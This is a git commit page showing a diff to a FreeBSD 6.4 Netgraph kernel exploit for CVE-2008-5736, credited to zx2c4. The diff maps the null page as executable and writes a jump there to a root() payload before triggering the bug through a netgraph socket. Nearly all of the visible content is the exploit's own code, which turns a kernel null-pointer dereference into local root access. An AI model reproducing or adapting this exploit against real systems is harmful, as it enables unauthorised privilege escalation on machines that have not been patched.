diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-27 01:48:51 -0500 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-27 01:48:51 -0500 |
commit | 83ff9d1ee5964795911c113fb8962de91e58398e (patch) | |
tree | a244abe889e308cada22806d8fe674536820f1dd | |
parent | Non functional jail escape functionality. (diff) | |
download | CVE-2008-5736-83ff9d1ee5964795911c113fb8962de91e58398e.tar.xz CVE-2008-5736-83ff9d1ee5964795911c113fb8962de91e58398e.zip |
Don't copy. Just jmp to function.
-rw-r--r-- | current-thread-exec.c | 31 |
1 files changed, 6 insertions, 25 deletions
diff --git a/current-thread-exec.c b/current-thread-exec.c index cd6bd1d..01f9acc 100644 --- a/current-thread-exec.c +++ b/current-thread-exec.c @@ -90,42 +90,23 @@ int root(void) int main(int argc, char *argv[]) { - unsigned char *c; - unsigned char *d; - void *v; - int s; - fprintf(stderr, "~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n"); fprintf(stderr, "~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n"); fprintf(stderr, "~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n"); fprintf(stderr, "[+] mmapping null page\n"); - v = mmap( - NULL, - PAGES * PAGE_SIZE, - PROT_READ | PROT_WRITE | PROT_EXEC, - MAP_ANON | MAP_FIXED, - -1, - 0); - if (v == MAP_FAILED) { + if (mmap(NULL, PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) { perror("[-] mmap failed"); return -1; } - fprintf(stderr, "[+] copying pwnage into null page\n"); - c = v; - d = (unsigned char*)root; - while (1) { - *c = *d; - if (*d == 0xc3) - break; - d++; - c++; - } - *c++ = 0xc3; + fprintf(stderr, "[+] adding jmp to pwnage in null page\n"); + *(char*)0x0 = 0x90; + *(char*)0x1 = 0xe9; + *(unsigned long*)0x2 = (unsigned long)&root; fprintf(stderr, "[+] opening netgraph socket\n"); - s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); + int s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); if (s < 0) { perror("[-] failed to open netgraph socket"); return -1; |